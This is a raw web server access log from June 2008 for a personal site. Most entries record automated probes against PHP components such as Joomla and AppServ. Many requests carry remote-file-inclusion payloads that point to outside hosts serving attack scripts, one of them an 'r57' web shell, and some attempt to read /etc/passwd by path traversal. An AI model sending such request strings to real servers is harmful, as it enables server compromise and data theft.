70.86.5.10 - - [09/Jun/2008:01:26:43 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.notahamsandwich.com"
91.121.87.84 - - [09/Jun/2008:01:27:12 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
81.230.176.76 - - [09/Jun/2008:01:27:53 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
91.121.87.84 - - [09/Jun/2008:01:35:22 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
81.230.176.76 - - [09/Jun/2008:01:37:44 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.6.18.233 - - [09/Jun/2008:01:40:08 -0700] "GET /logs/access_080128.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:01:41:08 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:01:41:09 -0700] "GET //appserv/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:01:41:09 -0700] "GET /logs//appserv/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:01:49:10 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
74.6.18.233 - - [09/Jun/2008:01:51:31 -0700] "GET /?N=A HTTP/1.0" 200 896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:02:04:16 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:02:04:16 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:02:04:16 -0700] "GET /config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:02:04:16 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
72.14.199.72 - - [09/Jun/2008:02:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
64.38.4.3 - - [09/Jun/2008:02:18:43 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
64.38.4.3 - - [09/Jun/2008:02:18:43 -0700] "GET //skin/zero_vote/error.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
64.38.4.3 - - [09/Jun/2008:02:18:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
64.38.4.3 - - [09/Jun/2008:02:18:47 -0700] "GET //skin/zero_vote/error.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
64.38.4.3 - - [09/Jun/2008:02:18:47 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
64.38.4.3 - - [09/Jun/2008:02:18:47 -0700] "GET /logs//skin/zero_vote/error.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:02:43:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:02:43:37 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:02:52:46 -0700] "GET /config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:02:52:46 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
72.14.199.23 - - [09/Jun/2008:03:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:03:22:05 -0700] "GET //?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 200 912 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:03:22:06 -0700] "GET /logs//?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 200 7664 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:03:27:34 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:03:27:35 -0700] "GET //appserv/main.php?appserv_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
212.239.21.26 - - [09/Jun/2008:03:27:35 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:03:31:51 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
74.6.18.233 - - [09/Jun/2008:03:39:12 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.22.159 - - [09/Jun/2008:03:47:02 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "notahamsandwich.com"
74.6.22.159 - - [09/Jun/2008:03:47:03 -0700] "GET /blog/?D=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "notahamsandwich.com"
195.242.99.93 - - [09/Jun/2008:03:49:06 -0700] "GET //index2.php?option=com_content&task=§ionid=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
195.242.99.93 - - [09/Jun/2008:03:49:06 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
212.227.65.79 - - [09/Jun/2008:03:51:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.immo-marrakech.com/files/contr2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.notahamsandwich.com"
212.227.65.79 - - [09/Jun/2008:03:51:28 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.immo-marrakech.com/files/contr2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.notahamsandwich.com"
212.227.65.79 - - [09/Jun/2008:03:51:31 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.immo-marrakech.com/files/contr2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.notahamsandwich.com"
72.14.199.72 - - [09/Jun/2008:04:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
134.155.241.28 - - [09/Jun/2008:04:32:34 -0700] "GET /logs/access.log HTTP/1.1" 200 34964 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:32:42 -0700] "GET /logs/access_080519.log/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:32:42 -0700] "GET /logs/access_080519.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:32:42 -0700] "GET /config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:32:43 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:32:43 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:32:43 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:37:25 -0700] "GET /logs/access.log/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:37:25 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
213.193.229.170 - - [09/Jun/2008:04:53:03 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.notahamsandwich.com"
213.193.229.170 - - [09/Jun/2008:04:53:04 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/check.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:55:00 -0700] "GET /logs/access.log/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:55:01 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:55:01 -0700] "GET /config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:55:01 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:55:01 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
193.254.184.51 - - [09/Jun/2008:04:55:02 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
208.80.193.47 - - [09/Jun/2008:05:01:04 -0700] "GET / HTTP/1.0" 200 498 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ESB{6DE67919-89F5-42A2-B2E1-3E435A56D687}; .NET CLR 1.1.4322)" "blog.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:05:03:14 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:05:03:15 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:05:03:15 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:05:03:15 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:05:03:16 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:05:03:16 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
65.55.210.252 - - [09/Jun/2008:05:06:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.notahamsandwich.com"
65.55.210.252 - - [09/Jun/2008:05:06:37 -0700] "GET /logs/ HTTP/1.1" 200 7659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.notahamsandwich.com"
77.91.224.15 - - [09/Jun/2008:05:14:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.notahamsandwich.com"
77.91.224.15 - - [09/Jun/2008:05:14:41 -0700] "GET / HTTP/1.1" 200 912 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.notahamsandwich.com"
72.14.199.100 - - [09/Jun/2008:05:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
205.234.253.134 - - [09/Jun/2008:05:20:25 -0700] "GET /impex/ImpExData.php?systempath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
205.234.253.134 - - [09/Jun/2008:05:20:31 -0700] "GET /impex/ImpExData.php?systempath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:05:23:46 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:05:23:46 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:05:23:46 -0700] "GET //ashnews.php?pathtoashnews=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
83.17.183.214 - - [09/Jun/2008:05:28:15 -0700] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
83.17.183.214 - - [09/Jun/2008:05:28:15 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
83.17.183.214 - - [09/Jun/2008:05:28:16 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
74.6.18.233 - - [09/Jun/2008:05:34:44 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:05:46:17 -0700] "GET /logs/access.log//membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:05:46:17 -0700] "GET /logs/access.log//membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:05:46:18 -0700] "GET //membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:05:46:18 -0700] "GET //membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:05:46:18 -0700] "GET /logs//membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:05:46:18 -0700] "GET /logs//membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
64.13.224.83 - - [09/Jun/2008:05:47:49 -0700] "GET /logs/access.log//membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.13.224.83 - - [09/Jun/2008:05:47:49 -0700] "GET //membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.13.224.83 - - [09/Jun/2008:05:47:49 -0700] "GET /logs//membres/membreManager.php?include_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:05:56:42 -0700] "GET //ashnews.php?pathtoashnews=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
211.43.206.79 - - [09/Jun/2008:05:56:42 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:06:01:57 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:06:01:59 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:06:02:00 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:06:02:02 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:06:02:03 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
71.39.214.250 - - [09/Jun/2008:06:02:05 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
72.14.199.23 - - [09/Jun/2008:06:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
193.64.244.176 - - [09/Jun/2008:06:22:04 -0700] "GET /logs//components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.6.22.159 - - [09/Jun/2008:06:22:44 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "notahamsandwich.com"
62.149.175.25 - - [09/Jun/2008:06:23:13 -0700] "GET /logs//components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
193.64.244.176 - - [09/Jun/2008:06:24:21 -0700] "GET /logs///components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
193.64.244.176 - - [09/Jun/2008:06:26:21 -0700] "GET /logs///components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
193.64.244.176 - - [09/Jun/2008:06:26:34 -0700] "GET /logs///components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
62.149.175.25 - - [09/Jun/2008:06:27:20 -0700] "GET /logs///components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
62.149.175.25 - - [09/Jun/2008:06:29:40 -0700] "GET /logs///components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
194.58.78.39 - - [09/Jun/2008:06:32:19 -0700] "GET /logs//index.php?skin_file=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
194.58.78.39 - - [09/Jun/2008:06:32:19 -0700] "GET //index.php?skin_file=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
62.149.175.25 - - [09/Jun/2008:06:32:31 -0700] "GET /logs///components/errors.php?error=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
